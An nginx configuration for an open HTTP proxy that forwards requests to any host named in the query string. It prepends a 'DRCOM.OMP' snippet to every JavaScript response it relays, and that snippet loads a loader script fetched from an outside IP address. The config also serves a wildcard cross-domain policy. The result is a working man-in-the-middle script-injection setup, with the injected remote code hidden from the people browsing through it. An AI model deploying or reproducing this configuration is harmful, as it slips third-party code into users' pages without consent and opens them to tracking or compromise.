
resolver 114.114.114.114 114.114.115.115;
client_body_buffer_size 128k;
client_header_buffer_size 32k;
large_client_header_buffers 4 64k;
client_max_body_size 24m;

server {
    listen 3128 backlog=512;
    #access_log /tmp/jsproxy.log;
    access_log off;
    location / {
            send_timeout 15;

            gzip on;
            gzip_comp_level 9;
            gzip_disable "msie6";
            gzip_proxied off;
            gzip_min_length 1024;
            gzip_buffers 16 8k;
            client_body_buffer_size 128k;
            client_max_body_size 32m;

            proxy_connect_timeout 60;
            proxy_send_timeout 60;
            proxy_read_timeout 60;
            proxy_buffer_size 4k;
            proxy_buffers 4 32k;
            proxy_busy_buffers_size 64k;
            proxy_temp_file_write_size 64k;
            proxy_buffering off;
            #proxy_set_header "Host" $http_host;
            proxy_set_header "Accept-Encoding" "gzip";
            #proxy_set_header "Referer" $http_referer;
            proxy_set_header Referer $http_referer;

            #proxy_pass http://$http_host$request_uri;
            proxy_pass http://$query_string;

            #force use HTTP 1.1
            proxy_http_version 1.1;
            proxy_set_header Connection "";

            add_before_body  /omp_js;
            addition_types application/x-javascript application/javascript text/javascript;
    }

    location = /omp_js {
        echo '/* DRCOM.OMP */
if(self===top&&window.omp_loaded!==1){window.omp_loaded=1;(function(a){var d=document,h=d.getElementsByTagName("head")[0]||d.documentElement,j=d.createElement("script");j.type="text/javascript";j.src=a;h.insertBefore(j,h.firstChild)})("http://127.0.0.1:2080/loader.js")};
';
    }

    location = /loader.js {
        proxy_pass http://120.31.130.152/loader.js;
        proxy_set_header Host "ompx.hqh.me";
    }

    location = /crossdomain.xml {
        add_header Content-Type application/xml;
        echo '<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>
';

    }
}

